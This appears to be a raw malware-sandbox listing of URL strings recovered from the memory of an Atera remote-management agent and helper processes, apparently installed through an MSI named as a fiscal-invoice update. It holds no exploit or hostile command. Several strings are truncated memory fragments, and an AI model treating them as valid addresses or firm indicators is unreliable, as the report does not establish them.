Source: AteraAgent.exe, 0000000C.00000002.1847212366.000002167AE53000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2770892227.000002517AB85000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertTrustedRootG4.crl
Source: AteraAgent.exe, 0000000E.00000002.2393257978.000001A571FA7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertTrustedRootG4.crl:$
Source: AteraAgent.exe, 0000000E.00000002.2397219667.000001A5723BA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.ncdc.gov.sa0
Source: AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB34D1000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.3050070641.0000011CC2ECB000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB3124000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://openjdk.java.net/
Source: AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB34D1000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.3050070641.0000011CC2ECB000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB3124000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://openjdk.java.net/legal/
Source: AgentPackageUpgradeAgent.exe, 0000002D.00000002.2794634831.0000019F9BFFB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://packagesstore.blob.core.windows.net
Source: AteraAgent.exe, 0000000E.00000002.2356972366.000001A50046D000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2666352179.00000251005B4000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2666352179.00000251008DB000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2666352179.00000251005F9000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2666352179.0000025100727000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ps.atera.com
Source: AteraAgent.exe, 0000000E.00000002.2356972366.000001A50046D000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000E.00000002.2356972366.000001A5003AB000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2666352179.00000251005B4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ps.pndsn.com
Source: AteraAgent.exe, 0000000C.00000002.1844841948.00000216000C9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.datacontract.org
Source: AteraAgent.exe, 0000000C.00000002.1844841948.00000216000C9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.datacontract.org/2004/07/
Source: AteraAgent.exe, 0000000C.00000002.1844841948.00000216000C9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.datacontract.org/2004/07/System.ServiceProcess
Source: AgentPackageMonitoring.exe, 00000024.00000002.2219201094.00000247F8B52000.00000002.00000001.01000000.00000023.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
Source: rundll32.exe, 00000004.00000002.1766749834.0000000004AE1000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.1766749834.0000000004B84000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000E.00000002.2356972366.000001A500001000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000011.00000002.1912831829.00000000049A1000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000011.00000002.1912831829.0000000004A47000.00000004.00000800.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 00000014.00000002.2037499219.0000028A55D31000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2666352179.0000025100001000.00000004.00000800.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 0000001B.00000002.2283587990.00000150BF221000.00000004.00000800.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 0000001B.00000002.2283587990.00000150BF496000.00000004.00000800.00020000.00000000.sdmp, AgentPackageSTRemote.exe, 00000021.00000002.2945403740.000002300018B000.00000004.00000800.00020000.00000000.sdmp, AgentPackageMonitoring.exe, 00000024.00000002.2211260331.00000247800ED000.00000004.00000800.00020000.00000000.sdmp, AgentPackageMonitoring.exe, 00000026.00000002.2352910675.000001C2800EE000.00000004.00000800.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 00000028.00000002.2516150200.000001F14AC61000.00000004.00000800.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 00000028.00000002.2516150200.000001F14AE9C000.00000004.00000800.00020000.00000000.sdmp, AgentPackageUpgradeAgent.exe, 0000002D.00000002.2794634831.0000019F9BFC5000.00000004.00000800.00020000.00000000.sdmp, AgentPackageTicketing.exe, 00000031.00000002.2962491449.0000021F25671000.00000004.00000800.00020000.00000000.sdmp, AgentPackageMonitoring.exe, 00000033.00000002.2655425408.0000025680298000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB2E41000.00000004.00000800.00020000.00000000.sdmp, AgentPackageHeartbeat.exe, 00000039.00000002.2574946100.000002A332E21000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 0000003D.00000002.2638576747.00000000048C1000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 0000003D.00000002.2638576747.0000000004960000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: AteraAgent.exe, 0000000E.00000002.2397219667.000001A5723BA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://web.ncdc.gov.sa/crl/nrcacomb1.crl0
Source: AteraAgent.exe, 0000000E.00000002.2397219667.000001A5723BA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://web.ncdc.gov.sa/crl/nrcaparta1.crl
Source: rundll32.exe, 00000003.00000003.1693514533.00000000049A5000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1705697487.000000000493B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1769078394.0000000004A1C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000011.00000003.1853750157.000000000468F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000003C.00000003.2532481551.0000000004AF6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000003D.00000003.2542669133.00000000048F1000.00000004.00000020.00020000.00000000.sdmp, Atualizador_Fiscal_NFe_37882912.msi	String found in binary or memory: http://wixtoolset.org
Source: rundll32.exe, 00000003.00000003.1693514533.0000000004974000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1705697487.000000000490A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1769078394.00000000049EB000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000011.00000003.1853750157.000000000465E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000003C.00000003.2532481551.0000000004AC5000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000003D.00000003.2542669133.00000000048C0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://wixtoolset.org/Whttp://wixtoolset.org/telemetry/v
Source: rundll32.exe, 00000003.00000003.1693514533.0000000004974000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1705697487.000000000490A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1769078394.00000000049EB000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000011.00000003.1853750157.000000000465E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000003C.00000003.2532481551.0000000004AC5000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000003D.00000003.2542669133.00000000048C0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://wixtoolset.org/news/
Source: rundll32.exe, 00000003.00000003.1693514533.0000000004974000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1705697487.000000000490A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1769078394.00000000049EB000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000011.00000003.1853750157.000000000465E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000003C.00000003.2532481551.0000000004AC5000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000003D.00000003.2542669133.00000000048C0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://wixtoolset.org/releases/
Source: AgentPackageMonitoring.exe, 00000024.00000002.2218081700.00000247F89D2000.00000002.00000001.01000000.0000001F.sdmp, AgentPackageMonitoring.exe, 00000033.00000002.2655425408.00000256805C9000.00000004.00000800.00020000.00000000.sdmp, AgentPackageMonitoring.exe, 00000033.00000002.2655425408.00000256800E9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.abit.com.tw/
Source: AteraAgent.exe, 0000000E.00000002.2393257978.000001A571FA7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.certplus.com/CRL/class2.crl0
Source: AteraAgent.exe, 0000000E.00000002.2393257978.000001A571FA7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.certplus.com/CRL/class3.crl0
Source: AteraAgent.exe, 0000000E.00000002.2397219667.000001A57232D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.datev.de/zertifikat-policy-int0
Source: AteraAgent.exe, 0000000E.00000002.2393257978.000001A571FA7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.defence.gov.au/pki0
Source: AteraAgent.exe, 0000000E.00000002.2356972366.000001A50046D000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000E.00000002.2356972366.000001A5003AB000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000E.00000002.2356972366.000001A5007A7000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000E.00000002.2356972366.000001A500611000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000E.00000002.2356972366.000001A5002C4000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2666352179.0000025100796000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2666352179.00000251008DB000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2666352179.00000251006DF000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2666352179.00000251006C9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.digicert.com/CPS
Source: rundll32.exe, 00000003.00000003.1693514533.00000000049A5000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1705697487.000000000493B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1769078394.0000000004A1C000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000C.00000002.1844841948.00000216000C9000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000C.00000002.1847212366.000002167ADF0000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000C.00000002.1848517334.000002167B90B000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000C.00000002.1847212366.000002167AE53000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000E.00000002.2397219667.000001A5723C7000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000E.00000002.2356972366.000001A5006AA000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000E.00000002.2400417114.000001A572422000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000E.00000002.2356972366.000001A50028E000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000E.00000002.2397219667.000001A5723FC000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000E.00000002.2404597582.000001A572843000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000E.00000002.2393257978.000001A571F41000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000E.00000002.2400417114.000001A5724D3000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000E.00000002.2404597582.000001A5727E0000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000E.00000002.2356972366.000001A500611000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000011.00000003.1853750157.000000000468F000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2666352179.00000251005B4000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2770892227.000002517ABD3000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2770892227.000002517AC04000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.digicert.com/CPS0
Source: AteraAgent.exe, 0000000E.00000002.2404597582.000001A57281A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.ica.co.il/repository/cps/Persona
Source: rundll32.exe, 00000004.00000002.1767433226.0000000007443000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.microsoft.co
Source: rundll32.exe, 00000011.00000002.1913949717.0000000007215000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.microsoft.cy
Source: AteraAgent.exe, 00000018.00000002.2666352179.00000251005F9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.nlog-project.org/schemas/NLog.xsd
Source: AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB34D1000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.3050070641.0000011CC2ECB000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB3124000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.oracle.com/technetwork/java/javase/jdk-relnotes-index-2162236.html
Source: AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB34D1000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.3050070641.0000011CC2ECB000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB3124000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB319B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.oracle.com/technetwork/java/javase/overview/index.html
Source: AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB34D1000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.3050070641.0000011CC2ECB000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB3124000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB319B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.oracle.com/technetwork/java/javase/terms/license/index.html
Source: AteraAgent.exe, 0000000C.00000002.1844841948.00000216000C9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.w3.o
Source: AteraAgent.exe, 0000000C.00000002.1844841948.00000216000C9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.w3.oh
Source: AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB34D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.w3.or
Source: AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB34D1000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.3050070641.0000011CC2ECB000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB3124000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB319B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://adoptium.net/
Source: AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB34D1000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.3050070641.0000011CC2ECB000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB3124000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB319B000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB3074000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://adoptopenjdk.net/
Source: AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB34D1000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.3050070641.0000011CC2ECB000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB3124000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://adoptopenjdk.net/upstream.html.
Source: AgentPackageAgentInformation.exe, 0000001B.00000002.2283587990.00000150BF496000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://agent-api.P
Source: rundll32.exe, 00000004.00000002.1766749834.0000000004B84000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000011.00000002.1912831829.0000000004A47000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 0000003D.00000002.2638576747.0000000004960000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://agent-api.aterD
Source: AteraAgent.exe, 0000000E.00000002.2356972366.000001A50046D000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000E.00000002.2356972366.000001A500001000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000E.00000002.2356972366.000001A5003AB000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000E.00000002.2356972366.000001A5002C4000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000011.00000003.1853750157.000000000465E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000011.00000002.1912831829.00000000049A1000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000011.00000002.1912831829.0000000004A47000.00000004.00000800.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 00000014.00000002.2037499219.0000028A55D31000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2666352179.0000025100001000.00000004.00000800.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 0000001B.00000002.2283587990.00000150BF221000.00000004.00000800.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 0000001B.00000002.2283587990.00000150BF496000.00000004.00000800.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 0000001B.00000002.2283587990.00000150BF2B5000.00000004.00000800.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 0000001B.00000002.2283587990.00000150BF467000.00000004.00000800.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 0000001B.00000002.2283587990.00000150BF3CD000.00000004.00000800.00020000.00000000.sdmp, AgentPackageMonitoring.exe, 00000024.00000002.2211260331.00000247800ED000.00000004.00000800.00020000.00000000.sdmp, AgentPackageMonitoring.exe, 00000026.00000002.2352910675.000001C2800EE000.00000004.00000800.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 00000028.00000002.2516150200.000001F14AC61000.00000004.00000800.00020000.00000000.sdmp, AgentPackageTicketing.exe, 00000031.00000002.2962491449.0000021F25671000.00000004.00000800.00020000.00000000.sdmp, AgentPackageMonitoring.exe, 00000033.00000002.2655425408.00000256803EE000.00000004.00000800.00020000.00000000.sdmp, AgentPackageMonitoring.exe, 00000033.00000002.2655425408.0000025680298000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 0000003C.00000003.2532481551.0000000004AC5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://agent-api.atera.com
Source: rundll32.exe, 00000003.00000003.1693514533.0000000004974000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1705697487.000000000490A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.1766749834.0000000004AE1000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.1766749834.0000000004B84000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1769078394.00000000049EB000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000011.00000003.1853750157.000000000465E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000011.00000002.1912831829.00000000049A1000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000011.00000002.1912831829.0000000004A47000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 0000003C.00000003.2532481551.0000000004AC5000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000003D.00000002.2638576747.00000000048C1000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 0000003D.00000002.2638576747.0000000004960000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 0000003D.00000003.2542669133.00000000048C0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://agent-api.atera.com/
Source: AgentPackageAgentInformation.exe, 00000028.00000002.2516150200.000001F14AE9C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://agent-api.atera.com/Prh
Source: AteraAgent.exe, 00000018.00000002.2666352179.0000025100001000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://agent-api.atera.com/Pro
Source: AgentPackageAgentInformation.exe, 00000014.00000002.2037499219.0000028A55D31000.00000004.00000800.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 0000001B.00000002.2283587990.00000150BF2B5000.00000004.00000800.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 0000001B.00000002.2283587990.00000150BF467000.00000004.00000800.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 0000001B.00000002.2283587990.00000150BF3CD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://agent-api.atera.com/Production
Source: rundll32.exe, 00000003.00000003.1693514533.0000000004974000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1705697487.000000000490A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.1766749834.0000000004AE1000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.1766749834.0000000004B84000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1769078394.00000000049EB000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000E.00000002.2356972366.000001A50046D000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000E.00000002.2356972366.000001A5003AB000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000011.00000003.1853750157.000000000465E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000011.00000002.1912831829.00000000049A1000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000011.00000002.1912831829.0000000004A47000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 0000003C.00000003.2532481551.0000000004AC5000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000003D.00000002.2638576747.00000000048C1000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 0000003D.00000002.2638576747.0000000004960000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 0000003D.00000003.2542669133.00000000048C0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://agent-api.atera.com/Production/Agent/
Source: AteraAgent.exe, 0000000E.00000002.2356972366.000001A5003AB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://agent-api.atera.com/Production/Agent/AcknowledgeCommands
Source: AteraAgent.exe, 0000000E.00000002.2356972366.000001A5000A2000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000E.00000002.2356972366.000001A5002C4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://agent-api.atera.com/Production/Agent/AgentStarting
Source: AgentPackageAgentInformation.exe, 00000014.00000002.2037499219.0000028A55D31000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://agent-api.atera.com/Production/Agent/CommandResult
Source: AgentPackageTicketing.exe, 00000031.00000002.2962491449.0000021F25671000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://agent-api.atera.com/Production/Agent/CommandResultRecurring/AgentPackageTicketingInstallHelp
Source: AteraAgent.exe, 0000000E.00000002.2356972366.000001A50010E000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000E.00000002.2356972366.000001A500084000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://agent-api.atera.com/Production/Agent/GetCommands
Source: AteraAgent.exe, 0000000E.00000002.2356972366.000001A50010E000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000E.00000002.2356972366.000001A5000A2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://agent-api.atera.com/Production/Agent/GetCommandsFallback
Source: AteraAgent.exe, 0000000E.00000002.2356972366.000001A500001000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://agent-api.atera.com/Production/Agent/GetEnvironmentStatus
Source: AteraAgent.exe, 0000000E.00000002.2356972366.000001A500001000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://agent-api.atera.com/Production/Agent/GetRecurringPackages
Source: AgentPackageAgentInformation.exe, 0000001B.00000002.2283587990.00000150BF496000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://agent-api.atera.com/Production/Agent/dynamic-fields/
Source: AgentPackageAgentInformation.exe, 0000001B.00000002.2283587990.00000150BF496000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://agent-api.atera.com/Production/Agent/dynamic-fields/script-based
Source: AgentPackageAgentInformation.exe, 0000001B.00000002.2283587990.00000150BF221000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://agent-api.atera.com/Production/Agent/dynamic-fields/script-based0i
Source: AgentPackageAgentInformation.exe, 0000001B.00000002.2283587990.00000150BF2B5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://agent-api.atera.com/Production/Agent/guiCommandResult
Source: AgentPackageAgentInformation.exe, 00000028.00000002.2516150200.000001F14AE9C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://agent-api.atera.com/Production/Agent/recurringCo
Source: AgentPackageAgentInformation.exe, 0000001B.00000002.2283587990.00000150BF467000.00000004.00000800.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 0000001B.00000002.2283587990.00000150BF3CD000.00000004.00000800.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 00000028.00000002.2516150200.000001F14AC61000.00000004.00000800.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 00000028.00000002.2516150200.000001F14AE9C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://agent-api.atera.com/Production/Agent/recurringCommandResult
Source: AgentPackageMonitoring.exe, 00000026.00000002.2352910675.000001C2800EE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://agent-api.atera.com/Production/Agent/thresholds/dfb304ca-1bde-49cc-a755-fa31deeb53c5
Source: rundll32.exe, 00000004.00000002.1766749834.0000000004AE1000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.1766749834.0000000004B84000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000011.00000002.1912831829.00000000049A1000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000011.00000002.1912831829.0000000004A47000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 0000003D.00000002.2638576747.00000000048C1000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 0000003D.00000002.2638576747.0000000004960000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://agent-api.atera.com/Production/Agent/track-event
Source: rundll32.exe, 00000004.00000002.1766749834.0000000004BC6000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000011.00000002.1912831829.0000000004A86000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://agent-api.atera.com/Production/Agent/track-event;
Source: AgentPackageMonitoring.exe, 00000033.00000002.2655425408.0000025680298000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://agent-api.atera.com/Production/Alerts/AddAlertsFromAgent
Source: AgentPackageMonitoring.exe, 00000033.00000002.2655425408.000002568048A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://agent-api.atera.com/Production/monitoring/v1/MonitoringPackage/AddAgentMetrics
Source: AgentPackageTicketing.exe, 00000031.00000002.2962491449.0000021F25809000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.nuget.org
Source: AgentPackageTicketing.exe, 00000031.00000002.2962491449.0000021F25809000.00000004.00000800.00020000.00000000.sdmp, AgentPackageTicketing.exe, 00000031.00000002.2959271020.0000021F24FC2000.00000002.00000001.01000000.0000003C.sdmp	String found in binary or memory: https://api.nuget.org/v3-flatcontainer/eo.webbrowser/24.1.46/eo.webbrowser.24.1.46.nupkg
